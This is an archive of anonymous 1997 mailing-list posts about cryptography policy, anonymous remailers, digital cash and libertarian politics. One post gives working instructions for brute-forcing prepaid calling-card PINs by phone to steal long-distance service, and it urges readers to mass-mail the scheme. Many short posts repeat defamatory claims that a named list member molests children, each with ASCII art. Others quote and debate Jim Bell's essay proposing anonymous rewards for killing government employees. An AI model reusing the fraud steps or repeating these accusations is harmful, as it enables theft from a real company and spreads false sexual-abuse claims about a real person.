Yes, yes...one man's morality is another's immorality.  Each of them thinks of himself as "being in the right" and sees the others as wrong or even "evil"  (witness the anti-BoyLover zealotry).  Different subjects but the same bullshit.  See the futility of it yet, Jamie?
If parents find pornography objectionable for their children, then they must take ultimate responsibility to keep pornography away from their kids.  If they are not willing to do this, then they should not have had the children in the first place.  It's up to them to take care of their kids. Not you, not me, not the government, and not some "voluntary" ratings

@_date: 1997-08-01 13:44:40
@_author: Anonymous 
@_subject: Attila T. Spammer / Re: Denning questions/reverses her position? 
As a matter of fact, the mere thought of this happening has caused
Attila to go into a state of "brain-lock" wherein he sits at his
keyboard, sending the same message, over and over again, to the list.
  It will be interesting to see what happens to Attila's brain if
Clinton ever vetos a bill because it subverts the Constitution.
  BTW, Dorothy Denning's new spokesperson is a flying pig, and the
Weather Network reports that Hell froze over shortly before Denning's
new position statement.

@_date: 1997-08-01 13:48:51
@_author: Anonymous 
@_subject: "Telco Terrorism" -- Wired on Baby Bells v. the Net 
If the telcos don't want to use efficient, effective technology
to render service to their customers, then I certainly wouldn't
want to *force* them to do so. However, neither do I want to be
*forced* to pay exhorbitant rates because the telecos want to
maintain a sloppily run monopoly on the services I have to choose
  My solution? (Thanks for asking. :>)
  If the telecos wish to remain in the Dark Ages, then let *their*
phone system crash. There will be no shortage of people standing
in line to make money by supplying customers with phone service at
competitive rates.
  The old "loss-leader" promotion to get everyone into your
store. The telecos, however, then want to lock the doors and
petition the government for monopoly pricing, instead of letting
the "customers" shop across the street, instead.
  "...so that we can raise the rates outrageously in the future."
  Translation~:~ They are usually manipulated by the most powerful
and influential of the power-crazed authoritarians.
  As long as everyone has Guns & Roses (with sharp thorns).
Say what you want about Timothy McVeigh, but if the government
launches another Waco atrocity in the near future, the citizens
will be paying much closer attention to the way it is handled.
  The attempt to control the InterNet is yet another attempt to
disarm the citizens. They are trying to get us to "voluntarily"
turn in our electronic weapons, such as crypto.
  "They will take my crypto when they pry it from my cold, dead

@_date: 1997-06-03 00:24:54
@_author: Anonymous 
@_subject: May's Banal Rant 
What most of us think is very weird is Rotenburg's apparent inability
to carry on a coherent dialogue.  Tim May raised several solid and
specific points.  We've got back ad hominem attacks on "libertarians".
Instead of name calling, Rotenburg would have done well to simply
justify (or change) his position.
At this point, Mr. Rotenburg and his supporters should explain exactly
what it is they do for us and how we can verify it.  "We arrived at a
compromise with the Senate" is not persuasive to most of the people on
this list.  When you believe that privacy will be promoted by hiring
more bureacrats the level of trust warranted is not high.  So, if EPIC
is doing any good, it had better be the kind of good we can monitor.
As for the ACLU, they are notoriously inconsistent when it comes to
the Constitution.  They seem to be pretty good with the First
Amendment, but that's about it.  They undermine the Second Amendment.
They campaign for welfare on the basis that it is a prerequisite for
the exercise of civil rights.  They sue aspirin manufacturers for
labelling their products in English.  They push "fair" credit laws.
Etc. Etc.
We don't need friends like the ACLU or, it appears, EPIC.
Dr. Roberts

@_date: 1997-06-03 02:11:17
@_author: Anonymous 
@_subject: Meet-in-the-middle attack 
Timmy C. May sexually molests little children, farm animals, and inanimate objects.
             ,,,
            ($ $)
        -ooO-(_)-Ooo- Timmy C. May

@_date: 1997-06-03 06:54:46
@_author: Anonymous 
@_subject: McVeigh 
Yes, poor Tim Mcveigh.  If he's innocent then he is one more victim of the OKC bomber.
Tim May: "broken eggs and all that"

@_date: 1997-06-04 09:32:38
@_author: Name Withheld by Request 
@_subject: ANNOUNCE: Mixmaster 2.0.4 beta available 
This is to announce the release of Mixmaster 2.0.4 beta.
  Mixmaster is a new class of anonymous remailers. Inspired by the
  existing "cypherpunk" remailers and discussions on the Cypherpunk
  mailing list, Mixmaster is the next generation in the evolution of
  remailer technology.
Mixmaster is available from:
What's new?
- several bug fixes.
- "middle only" remailer.
- messages compression.
- support for /dev/random.
- rudimentary support for the list of reliable Mixmaster remailers.
- new installation script.
- can be compiled under DOS/Windows.
Mixmaster is (C) by Lance Cottrell .
This release was made by Ulf Mller .

@_date: 1997-06-05 10:09:27
@_author: Anonymous 
@_subject: Password pirates plunder XXX sites, from The Netly News 
A huge number of passwords to pay-only porn sites are loose on
   the Net. Just surf newsgroups like alt.sex.passwords or do a simple
   search through a typical web engine and long lists of logins are easy
   to find.
There is an easy solution to this problem.  Just use one-time passwords.
Put it in a cookie.  Every time the customer accesses the service you give
him a new one.  He doesn't have to do anything.  If he gives his password
away it won't work for him any more.

@_date: 1997-06-06 03:59:57
@_author: Anonymous 
@_subject: The New War 
Denning thinks export of authentication and signature technology is OK,
but she draws the line at encryption.  This sounds fine, but what happens
when new technologies don't fit into these neat boxes?
How about blind signatures?  Those are used to create anonymous electronic
cash systems.  How comfortable will Denning be when criminals can set up
their own anonymous payment systems?
Would blind signature technology be allowed for export today?
How about zero knowledge protocols?  These can be used to show different
kinds of anonymous credentials and can be used to build anonymous cash
systems in their own right.  Generally, they enhance privacy by allowing
the parties to reveal only the information which is specifically necessary
for a transaction.
Would zero knowledge software be allowed for export today?
How about multiparty computations, or oblivious transfer, or blob
commitments, or any of the other building blocks of tomorrow's crypto
technology?  What is the export status of these going to be?  Will Congress
have experts who put each piece under a microscope and try to judge
whether it will be used for good purposes or bad?  It can't be done.  As
well allow exporting the letter "a" but not "i" since "i" is part of "kill".
This attempt to split cryptology into good and bad technologies won't work.
Knowledge space doesn't work that way.  It's probably not even going to be
possible to identify what is crypto and what isn't.  It's all a matter of dealing
with information in various ways.
Cypherpunks can expose this confusion by implementing other protocols and
trying to get them exported.  Go beyond old-fashioned signatures and
encryption.  These are mainstream today.  Stay on the edge, be ahead of the
curve.  Do something new.

@_date: 1997-06-07 02:18:51
@_author: Anonymous 
@_subject: [URGENT] Sphere packings 
Tim C[unt] May's 16Kb brain's single convolution is directly wired to his rectum for input and his T1 mouth for output. That's 16K bits, not bytes. Anal intercourse has caused extensive brain damage.
 ///////
 \-oo-/  Tim C[unt] May
  \--/
   \/

@_date: 1997-06-07 09:47:46
@_author: Anonymous 
@_subject: Who subscribes to the list? 
Yup, apparently relay.com and reply.com have gotten quite a bit of
remailer at replay.com's mail.  In fact, relay.com has complained about this
several times.  (Obviously they were reading the misdirected mail.)

@_date: 1997-06-08 22:47:23
@_author: Anonymous 
@_subject: ethanol, which is a fuel made from a mixture of corn and your tax dollars 
June 6, 1997
Potomac Watch
Guess Who's Trying To Save Corporate Welfare
By PAUL A. GIGOT
Let us now break this column's recent pattern and praise a Republican.
He's Texan Bill Archer, who is taking a run at the federal government's
worst case of corporate welfare. He has just one problem: Other
Republicans, notably the speaker of the House.
Mr. Archer wouldn't have sat in the minority for 24 years if he wasn't
willing to tilt at windmills. But now that he's running the tax-writing
Ways and Means Committee, his tilting matters. So this year he's aiming
at ethanol, which is a fuel made from a mixture of corn and your tax
dollars. He has enough votes to get the bill through his committee, and
it could pass Congress if the GOP leadership gave it a push.
The entire corporate welfare debate is a good test of whether the GOP's
ultimate loyalties lie with business, or with taxpayers. The ethanol
savings would be only a couple of billion dollars, but in today's
Washington we have to be grateful for small favors. By shutting down
this corn sluice, Republicans would show they can ox their own political
gore. They'd also create more space for tax cuts that'd help more
Americans, such as for capital gains.
The political timing won't get any better. When Mr. Archer first tried
this in late 1995, Bob Dole, self-described Senator Ethanol, hadn't yet
retired. The presidential caucuses in Iowa, ethanol's Elysian fields,
were three months away, not three years as they are now.
Archer-Daniels-Midland Co., the political benefactor and ethanol
beneficiary, hadn't yet pleaded guilty to price-fixing charges.
Farm-state Republicans had more leverage over their leadership in 1995
because the GOP was trying to pass a budget with only GOP votes. Now in
bipartisan mode, Republican leaders can pick up some Democrats to keep a
All of which puts the pressure squarely on Newt Gingrich, who has to
decide if he again wants to rescue the ethanol subsidy at the House
Rules Committee pass. That's what he did in 1995 after consulting
Senator Ethanol. The speaker explained to some of us then that killing
the subsidy was too politically risky while Republicans were trying to
change so much of the rest of the government.
But Republicans are now trying to change very little of the government,
and Mr. Gingrich is still resisting. "I do not believe it is possible in
this Congress to eliminate the ethanol tax break," the speaker told
reporters this week. That's analysis masking incumbent protection. The
speaker is fronting for members who don't want to cast any difficult
votes this Congress.
Those members include several ferocious Republican opponents of the
welfare state, nonfarm version: Nebraska's Jon Christensen, erstwhile
revolutionary; John Boehner, from the farm state of greater Cincinnati;
Henry Hyde of the poverty-stricken Chicago suburbs; Michigan's Fred
Upton, the renowned budget balancer; and Helen Chenoweth, Idaho's
scourge of Big Government.
Perhaps they were inspired to sign a letter embracing ethanol subsidies
by another co-signer, the greatest class warrior in all of Congress,
Michigan Democrat and man of the people, David Bonior. He's now earned
the title of Congressman Ethanol.
This crowd must have missed a recent General Accounting Office report,
which found that the ethanol subsidy justifies none of its political
boasts. It doesn't help air quality much, hardly reduces U.S. dependence
on foreign oil and shovels much of its benefit to big ethanol producers.
"Sixty-five percent of capacity is owned by the three largest firms, and
the largest firm, Archer-Daniels-Midland, owns 50% of capacity," says
the GAO study. Some things dubbed "corporate welfare" are arguably
useful, but this isn't one of them.
What's most notable, and depressing, about all of this is that it
symbolizes the GOP Congress's change from reformers to incumbents. A
majority Democratic coalition is naturally held together by its power to
dispense government favors. But Republicans won their majority in 1994
running on ideas and reform.
The danger for Republicans is that they are slowly evolving into a
majority whose main rationale is keeping power. "That's what I fear more
than anything," says Indiana Rep. David McIntosh, who voted against the
budget deal for that reason. This may let Republicans keep their
majority in 1998, but it hardly offers much reason to increase it, or
much of an agenda. And sooner or later even House Democrats will figure
out they can win back the House if they depict Republicans as the party
of status quo government.
All politicians claim to hate corporate welfare, but they vote for it
when only the beneficiaries are watching. They could learn from T.J.
Rodgers, the Silicon Valley entrepreneur, who has rounded up 61 fellow
high-tech CEOs to say they support cutting corporate subsidies, even if
it means giving up their own federal grants. Republicans are supposed to
believe this too, as Bill Archer, to his credit, is reminding them.
--from the Wall Street Urinal, used without permission, all rights

@_date: 1997-06-09 08:26:19
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Quadratic residues 
`A pen is mightier than a sword', not to mention Timmy C. May's pea-sized penis. He would be better served by a safety razor, possibly applied in a bathtub filled with warm water (something he has surely never been into).
      o
  /\O/        O Timmy C. May
 0  \\    | 0-#
    //    |  / \

@_date: 1997-06-10 02:47:10
@_author: Anonymous 
@_subject: Your REFUND from IQ INTERNET IS HERE! 
Your REFUND from IQ INTERNET IS HERE!
This message is for anyone who was ripd off by IQ INTERNET  You can now obtain a FULL Refund paid to these
Bastards by following these simple instructions.
I could also use some help in distributing this REFUND offer!
Please help me by mass emailing this out to the Internet.  I am sure
we could find others who would like a REFUND too! (g) LOL!
I just discovered a "way cool" crack for IQ DIRECT / WMRG COM., a pre-paid calling card company.  If you want FREE long distance to any where in the world here it is.!!!
Call 1-800-510-7941 the automated prompt will ask you for a pin number.
Now here is the "Way Cool" Crack ...The pin number is a 10 digit code, for example: 748-700-4162  The first 3 numbers is the 'batch" code and will always stay the same.
The "batch" codes seem to run sequentially. In other words 100, 101,112 ...748,749,....999 end.  The "batch" codes also represents dollars denominations of $5, $10, $20, $50, $100, $500!!! (lol G)
The second and third set of numbers are somewhat random.  However as in the example 748-700-4163, I know of people who have been able to pick up a lot of FREE time just by changing one number in the second or third set of numbers. When you dial the 1-800-510-7941 number the automated voice will allow you 5 attempts to enter the correct pin number.  You will be disconnected after the 5th attempt.  But hey, no problem!  Just call back and retry.  I have found on average that within the 10th attempt at entering a pin number, you will find an authorized pin number!
It is really a lot of fun!  Sort of like spinning the Wheel of Fortune and coming up with a jackpot of up to $500 in pre-paid long distance!
This crack is likely to end within 1 week of this posting 6/07/97. Do yourself a favor and Hurry!  Let everyone know about this "limited" opportunity. (G)
Due to high call traffic you may run into busy signals  (lol & G)!!!
Dialing For Dollars$$$

@_date: 1997-06-10 19:09:33
@_author: Anonymous 
@_subject: NoneRe: Assassination Politics as revenge fantasy (Re: FCPUNX:McVeigh) 
Moral issues aside, one of the problems plaguing
        Bell's scheme is that it's not limited to
        eliminating "government thugs who violate your
        rights," as he likes to describe it. If it
        existed, anyone with some spare change could
        wipe out a nosy neighbor or even an irritating
        grocery store clerk.
Not likely, but for another reason.  Assuming you had the money to take
out your neighbor, it's going to be fairly obvious who did it.  (How many
neighbors do you have?  Pretty short list of suspects.)
Also, killing some nobody in a grocery store is more prone to error, and
less widely witnessed, and therefore harder to collect payment on, thus
less profitable.
The possibility of Microsoft killing their competition's engineers is
somewhat more realistic, although lately they've been hiring a lot of
them instead, so maybe they don't want to kill them. :)

@_date: 1997-06-11 01:53:51
@_author: Anonymous 
@_subject: Hash functions 
Given Tim May's propensity to molest little children, is it any surprise that the state of California wants to have him       _  o
<)_/# Tim May
     TT  <T

@_date: 1997-06-11 05:49:26
@_author: Anonymous 
@_subject: Untraceable Contract Killings 
People do not just go kill their neighbors for no reason; there is going
to be some dispute or history of antagonism between them.  Investigators
almost always start by questioning the usual suspects.
The technology may be perfect, but human error will get you every time.
We know Bell didn't invent it, but who is really eager to go to the
prosecutors in Washington and tell them "It was all my idea."

@_date: 1997-06-11 08:10:03
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] e$ 
Timothy C. Mayonnaise is a pimply dweeb sitting at a computer chortling at his own imagined cleverness.
   . o       c ,
   `' --v Timothy C. Mayonnaise
    /'>     <`\

@_date: 1997-06-11 12:09:06
@_author: Anonymous 
@_subject: [Noise, California only] Good deal on ISDN access 
Lucky Green sez:
But don't they still charge you a penny a minute?  That adds up fast, and
would probably cost you more than your $50 internet access fees.  Plus the
cost of ISDN service...  All told, you're looking at $150 or so per month.
When for $150 you can get a brand spanking new 56K modem, and pay $20-30 a
month.  Not as fast, but a much better price/performance ratio.

@_date: 1997-06-13 18:10:50
@_author: Anonymous 
@_subject: Quadratic residues 
Timmy C. Maya's wee-wee is so tiny that only his mommy is allowed to touch it.
    __o
  _ \<_  Timmy C. Maya
 (_)/(_)

@_date: 1997-06-14 19:11:26
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] ZKP 
Timothy C. Mayo is not only as queer as a three dollar bill, but he is also into having sex with   (((>     /<
 (        /
  ((({{{{{:<  Timothy C. Mayo
          \
           \<

@_date: 1997-06-17 04:22:16
@_author: Anonymous 
@_subject: eDrugs / Re: e$: Skins vs. Shirts 
That's the nice thing about data-based drugs -
just tear open this hypercard and look at the nice binary patterns,
and you can make lots of copies for your friends.
Do _you_ have the hacker nature?
Do you _still_ have the hacker nature?
                 Raven

@_date: 1997-06-19 04:37:58
@_author: Anonymous 
@_subject: NoneRe: Recipient Anonymity 
So what you're saying is:
                             - Messages -            A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Server 1:  1 0 1 1 0 1 0 0 1 0 1 0 0 0 1 0 1 1 0 1 0 1 0 0 1 1
Server 2:  0 1 1 0 1 1 1 0 1 0 0 0 1 0 0 1 0 1 0 1 0 0 0 1 0 0
Server 3:  1 1 0 1 1 0 1 0 0 0 1 0 1 0 1 1 0 0 0 0 0 1 0 1 1 1
So server 1 sends back the xor of messages A,C,D,F...Z; server 2 sends
back the xor of B,C,E,F,G...etc.  The xor of all of that cancels out
everything except Message Q.  But as long as at least one of the servers
doesn't keep logs then nobody will know that except the person who
downloaded it. Clever.  It sure beats reply-blocks.  :)

@_date: 1997-06-19 12:32:36
@_author: Anonymous 
@_subject: NoneRe: Receiving Messages Anonymously 
An anonymous message pool.  How is this different from posting to
alt.anonymous.messages?  (Other than it would annoy list readers. :)

@_date: 1997-06-19 12:53:18
@_author: Anonymous 
@_subject: NoneRe: Recipient Anonymity 
So what you're saying is:
                             - Messages -            A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Server 1:  1 0 1 1 0 1 0 0 1 0 1 0 0 0 1 0 1 1 0 1 0 1 0 0 1 1
Server 2:  0 1 1 0 1 1 1 0 1 0 0 0 1 0 0 1 0 1 0 1 0 0 0 1 0 0
Server 3:  1 1 0 1 1 0 1 0 0 0 1 0 1 0 1 1 0 0 0 0 0 1 0 1 1 1
So server 1 sends back the xor of messages A,C,D,F...Z; server 2 sends
back the xor of B,C,E,F,G...etc.  The xor of all of that cancels out
everything except Message Q.  But as long as at least one of the servers
doesn't keep logs then nobody will know that except the person who
downloaded it. Clever.  It sure beats reply-blocks.  :)

@_date: 1997-06-19 15:04:33
@_author: Anonymous 
@_subject: PGP 5.0 source shipped to Europe! 
Unknown Cypherpunks shipped the PGP 5.0 source to Europe.
See the source books! Read the shipping label! Trace the package!

@_date: 1997-06-19 15:33:21
@_author: Anonymous 
@_subject: Recipient Anonymity 
So what you're saying is:
                             - Messages -            A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Server 1:  1 0 1 1 0 1 0 0 1 0 1 0 0 0 1 0 1 1 0 1 0 1 0 0 1 1
Server 2:  0 1 1 0 1 1 1 0 1 0 0 0 1 0 0 1 0 1 0 1 0 0 0 1 0 0
Server 3:  1 1 0 1 1 0 1 0 0 0 1 0 1 0 1 1 0 0 0 0 0 1 0 1 1 1
So server 1 sends back the xor of messages A,C,D,F...Z; server 2 sends
back the xor of B,C,E,F,G...etc.  The xor of all of that cancels out
everything except Message Q.  But as long as at least one of the servers
doesn't keep logs then nobody will know that except the person who
downloaded it. Clever.  It sure beats reply-blocks.  :)

@_date: 1997-06-19 15:34:40
@_author: Anonymous 
@_subject: Receiving Messages Anonymously 
An anonymous message pool.  How is this different from posting to
alt.anonymous.messages?  (Other than it would annoy list readers. :)

@_date: 1997-06-20 10:27:48
@_author: Anonymous 
@_subject: Recipient Anonymity 
Okay.  Let's suppose that there are 10,000 messages (more realistic for a
large remailer i think)  And I am going to spread it over five servers,
And I use a 32-bit hash function (one in four billion chance I get someone
else's message)
First I download the list of Message IDs/Hashes. (40,000 bytes)
Then I download the recipient list. (another 40,000 bytes)
I find a message for me.  Let's suppose the messages are 20K each.
I send each server a list of the messages I want (10,000 bits, which is
1,250 bytes each, so 6,250 bytes total)
Finally, I get back five 20K messages from each of the five servers.
So that's a total of 80K to download the IDs/recipients lists, 6.25K to
upload the requests, and 100K to download the message pieces, to read my
20K email.  I guess that could work.

@_date: 1997-06-20 20:06:52
@_author: Anonymous 
@_subject: 96rock (96.1)--"The Home of Capital Punishment" 
_The Atlanta Journal-Constitution_
"Contest Controversy: Radio Promotion Is Called Tasteless"
Miriam Longino, Staff Writer
Atlanta radio station 96rock is making waves with a contest that asks listeners to predict the year, month, day and time when convicted Oklahoma City bomber Timothy McVeigh will be executed. The winner gets a free trip to cover the event.
Rock Station WKLS-FM (96.1)--calling itself "The Home of Capital Punishment"--is running a 45-second spot 12 times a day to pitch the contest.
...96rock promotions director, Pat Ervin, ...says he feels the station is "playing on the sentiment of the majority of the public." "We saw an opportunity," he says. "It's obvious that people are very passionate about this thing. So we decided to use a creative mechanism to tap into that."
[More follows]

@_date: 1997-06-21 06:17:40
@_author: Anonymous 
@_subject: It's not over 
Let's cut all the doom and gloom here.  The bill isn't passed yet.  It's
got to go through at least one and possibly two more committees before
it reaches the senate floor, where we'll have another chance to defeat it.
Even then the house has to pass similar legislation.  That will be yet another
When Clipper was proposed, a wave of anger and opposition swept forth.
The same thing needs to happen now.  This fatalism is self defeating.
Either you're part of the solution or you're part of the problem.  People who
say there's no use fighting, who give up, who oppose the efforts of the
crypto lobbying groups in the name of ideological purity, are not part of
the solution.  They have no right to complain if this law passes.  By
sitting aside and carping at the efforts of those who are trying to stop this
kind of legislation, they are only helping to bring it about.
There is no reason this new bill should be any more acceptable or more
successful than Clipper was.  We only have to fight it.

@_date: 1997-06-21 19:50:30
@_author: Anonymous 
@_subject: [STEGO] Quadratic residues 
`A pen is mightier than a sword', not to mention Timothy C[ocksucker] Mayonnaise's pea-sized penis. He would be better served by a safety razor, possibly applied in a bathtub filled with warm water (something he has surely never been into).
       ((__)) Timothy C[ocksucker] Mayonnaise
        (00)
       (o__o)

@_date: 1997-06-22 18:07:18
@_author: Anonymous 
@_subject: Diffie-Hellman 
May Tim C. Mayflower's forgeries get stuck up his ass so he'll have to shit through his filthy mouth for the rest of its miserable life.
          .oooO           Oooo.
          (   )   _   _   (   )
           \ (   / ) ( \   ) /
        ----\_)-/ (---) \-(_/---- Tim C. Mayflower
               (   ) (   )
               oooO   Oooo

@_date: 1997-06-23 06:27:47
@_author: Anonymous 
@_subject: Hettinga's e$yllogism 
Why can't escrowed ecash support digital commerce?  Strong crypto with
a government backdoor.  That's what you're offered.  Prove it can't work.

@_date: 1997-06-23 10:05:45
@_author: Anonymous 
@_subject: Canarypunk: Jim Bell in a coalmine 
Free speech - Unless Govt. doesn't like it
Organization   Alternate Access Inc.
Date           Sat, 21 Jun 1997 19:23:39 -0700
Newsgroups     or.politics
Message-ID     <33AC8CAB.199F at ipns.com>
This is in reference to a local, that's being held incommunicado
in Tacoma. I've personally tried to contact Jim and the Marshalls office said they'd "try" to get a message to him, wouldn't give me an address, and were REALLY interested in my address.
 I believe the reason for holding Jim incomunicado is that the ACLU
requires that the accused ask them for help, and the feds know that
if Jim can't ask he won't get their help.
Vin covers the situation nicely...
[Vin Suprynowicz column:]
    In the summer of 1995, 39-year-old electronics engineer Jim Bell of
Vancouver, Wash. (coincidentally the scene of the climactic battle between militia and central government forces in Ian Slater's current potboiler paperback "Showdown: U.S.A. vs. Militia,") penned an intriguing and controversial essay called "Assassination Politics," which has since been kicking around various Internet discussion groups, triggering responses from delight to outrage.
  This section from Mr. Bell's introduction gives the gist:
  "A few months ago, I had a truly and quite literally 'revolutionary'
idea, and I jokingly called it 'Assassination Politics': I speculated on
the question of whether an organization could be set up to legally announce that it would be awarding a cash prize to somebody who correctly
'predicted' the death of one of a list of violators of rights, usually
either government employees, officeholders, or appointees. It could ask for anonymous contributions from the public, and individuals would be able send those contributions using digital cash.
  "I also speculated that using modern methods of public-key encryption and anonymous 'digital cash,' it would be possible to make such awards in such a way so that nobody knows who is getting awarded the money, only that the award is being given. Even the organization itself would have no
information that could help the authorities find the person responsible for the prediction, let alone the one who caused the death. ...
  "Obviously, the problem with the general case is that the victim may be
totally innocent under libertarian principles, which would make the killing a crime, leading to the question of whether the person offering the money was himself guilty.
  "(But) my speculation assumed that the 'victim' is a government employee, presumably one who is not merely taking a paycheck of stolen tax dollars, but also is guilty of extra violations of rights beyond this. (Government agents responsible for the Ruby Ridge incident and Waco come to mind.) In receiving such money and in his various acts, he violates the
'Non-aggression Principle' (NAP) and thus, presumably, any acts against him are not the initiation of force under libertarian principles.
  "The organization set up to manage such a system could, presumably, make up a list of people who had seriously violated the NAP, but who would not see justice in our courts due to the fact that their actions were done at the behest of the government. ..."
  In a followup essay titled "Fishing Expedition Swims Against the Tide,"
published in the May 14 edition of the daily Portland Oregonian, Bell
wrote, in part:
  "... I've been openly debating the idea on the Internet since then with
anyone who will listen. My essay surprises many and shocks more than a
few, but I am pleased that such a truly revolutionary concept has been so
well received. Even the Columbian newspaper ( has decided to add a pointer to the essay.
  "The only 'threat' in the essay is to the jobs of the people who have
been parasites on the rest of us for decades, as well as to the future of
tyrannies around the world.  But that's why, on April 1, 20 federal agents burst in and took my computer, told the news media I was 'armed and
dangerous,' and began engaging in a fishing expedition including harassing people simply for knowing me. (No arrest or charges so far.) ..."
  The charges were forthcoming.
  Jim Bell was arrested on Friday, May 16, and has been held ever since,
without bond, in the Pierce County Jail in Tacoma, Wash., on a federal
complaint which alleges:
  "Beginning at a time unknown, and continuing to the present, ... JAMES
DALTON BELL did corruptly obstruct and impede ... the due administration of the internal revenue laws, among other things, by collecting the names and home addresses of agents and employees of the Internal Revenue Service
('IRS') in order to intimidate them in the performance of their official
functions; by soliciting others to join in a scheme known as 'Assassination
Politics' whereby those who killed IRS employees would be rewarded; by
using social security account numbers that were not assigned to him to hide his assets and thereby impede the IRS's ability to collect his unpaid
taxes, and by contaminating the area outside of the office of the IRS in
Vancouver, Washington, with mercaptan, a chemical that causes a powerful
  Nor does the complaint stop short with an alleged "stink bomb" floor mat, proceeding to allege that Mr. Bell has at times discussed poisoning water supplies, sabotaging government computers, and, well ... "overthrowing the Government of the United States."
  The question here would appear to be whether Mr. Bell has actually taken substantive steps, as alleged, to "implement" the theory in his speculative Internet essay, or whether it is the IRS -- who since Feb. 20 have seized the heretofore non-violent Mr. Bell's car, wages and bank accounts (presumably stymying at the very last minute his plan to "overthrow the Government of the United States") -- who are doing the "threatening and intimidating," in an attempt to send a message to anyone who dares speculate about how justice might ever be obtained against federal agents ... given that they are rarely if ever indicted, even for the willful murder of children, as at Waco and Ruby Ridge.
  If the defendant Bell has indeed taken substantive steps to set in motion the murder of any specific government agent, that of course is a crime, for which he should expect to face the consequences.
  On the other hand, if writings of the "what if someone ..." variety have now become a felony so serious that one can be seized and held without bond, most of America's adventure and science fiction writers -- who up till now have felt safe spinning thinly-veiled yarns about near-future government coups and such -- had better watch their   Mr. Bell's attorney, Peter Avenia of the Public Defenders Office in
Tacoma, says he fully expects Mr. Bell to be indicted by a federal grand
jury within the next few weeks.
  I asked Mr. Avenia if he believes the case will present substantive First Amendment questions.
  "It certainly does concern me."
  Is the IRS making an example of Mr. Bell, to chill any further
discussions on the Internet of how justice can ever be had in the case of
uniformed killers who apparently need no longer fear being indicted or
brought to trial in this country?
  "It's certainly a possibility. In the context of the Oklahoma City
bombing it's certainly a hostile atmosphere for any such defendant. I think we can certainly ask whether the government is trying to send a message to people who pen inflammatory writings."
  Defense attorney Avenia can be reached at the Federal Public Defenders
Office, 1551 Broadway, Suite 501, Tacoma, Wash. 98402. The essay
"Assassination Politics" is available on the Internet at
 The current federal complaint against Mr. Bell can
be found at Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The web site for the Suprynowicz column is at Vin Suprynowicz,   vin at lvrj.com
Voir Dire: A French term which means "jury stacking."

@_date: 1997-06-25 14:52:01
@_author: Anonymous 
@_subject: Comparing Cryptographic Key Sizes II 
First part true, second part false.  See Schneier, p.160.  Extrapolating
using GNFS factoring indicates ratio of 1E21.  If SNFS factoring becomes
possible it is much worse, ratio less than one million.

@_date: 1997-06-25 23:08:40
@_author: Anonymous 
@_subject: No Subject 
I was told that CBS or some other station air'd a story on Sweden.
"Sweden" ( not sure who? ) stated that they had knowledge of how to enter
ANY system that was conected to the internet.  Firewalls, etc... were
useless.  Has anyone else seen /or know this and is this true? or
complete mis-information?

@_date: 1997-03-03 16:52:32
@_author: Anonymous 
@_subject: 2-way anonymous ecash ? 
From: Peter.Foldiak at st-andrews.ac.uk (Peter Foldiak)
  Newsgroups: sci.crypt
Digicash says:
"... ecash is not at all well suited for black markets, extortion,
bribes and tax evasion. The reason is that only the payer is anonymous,
the recipient of the money has no anonymity at all.
Furthermore, all money that the payee receives must be given to the
bank. It is not possible to hide from the bank the fact that you
received money (and thereby hide it from the authorities). So
tax-evasion is definitely out. For people who operate black markets
the same story holds. First of all, their income is visible. The second
reason is far better: if any of the customers ever wants to,
he can prove that a certain payment was made by him. This means that
a criminal accepting ecash
can be identified with the retroactive help one of his customers. ..."
Is this really true under all circumstances? Can (some kind of) e-cash
be made truly two-way anonymous, like physical cash?

@_date: 1997-03-03 22:50:35
@_author: Anonymous 
@_subject: Presidential decrees and emergency powers 
Although slightly dated (it's before the latest regs), it hits some of the
main points.
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     |
P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-03-04 08:04:16
@_author: Anonymous 
@_subject: Presidential decrees and emergency powers 
Something got lost there, let's try again...
Oh, the things we do to avoid spammers...
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-03-04 12:55:06
@_author: Anonymous 
@_subject: Forgery detection 
Timothy C[retin] May is another loser who pays for got.net because he lacks the mental capacity to gain net access as a perk of either employment or academic achievment.
          ,,,
         ($ $)
     -ooO-(_)-Ooo- Timothy C[retin] May

@_date: 1997-03-09 15:23:03
@_author: Anonymous 
@_subject: [IMPORTANT] Diffie-Hellman 
Timmy May's obsessive masturbation has lead to advanced degree of blindness and hairy palms.
         /_/\/\
         \_\  / Timmy May
         /_/  \
         \_\/\ \
            \_\/

@_date: 1997-03-23 08:21:53
@_author: Anonymous 
@_subject: Britain to ban free use of crypto?  (fwd) 
[This message was run through an anonymizer as a spam-blocker.  My .sig
is at the end.]
 "Peter D. Junger"  stated:
FWIW, the speaker from the UK government at CFP '97 described the proposal
in almost exactly these terms.  And tried to make clear that greater bans
were not on the agenda, at least for now. A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-03-23 18:15:25
@_author: Anonymous 
@_subject: PGP as disinformation 
Has this list not considered the very real possibility that PGP is itself a
rogue program released by the intelligence apparatus to detour we
As I have been arguing, the obvious is often false.
While certain statists on this list are arguing in vain that I lack
expertise in cryptographic matters, the truth is apposite this.
Ask not for whom Bell toils,
Dr. Roberts

@_date: 1997-03-29 11:19:02
@_author: Anonymous 
@_subject: Hard to Tax Scenario  (fwd) 
For my views on taxes see
      A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-03-29 16:38:57
@_author: Anonymous 
@_subject: [ANNOUNCEMENT] Cyclic codes 
Timmy `C' Mayonnaise sexually molests little children, farm animals, and inanimate objects.
   o-:^>___? Timmy `C' Mayonnaise
   `~~c--^c'

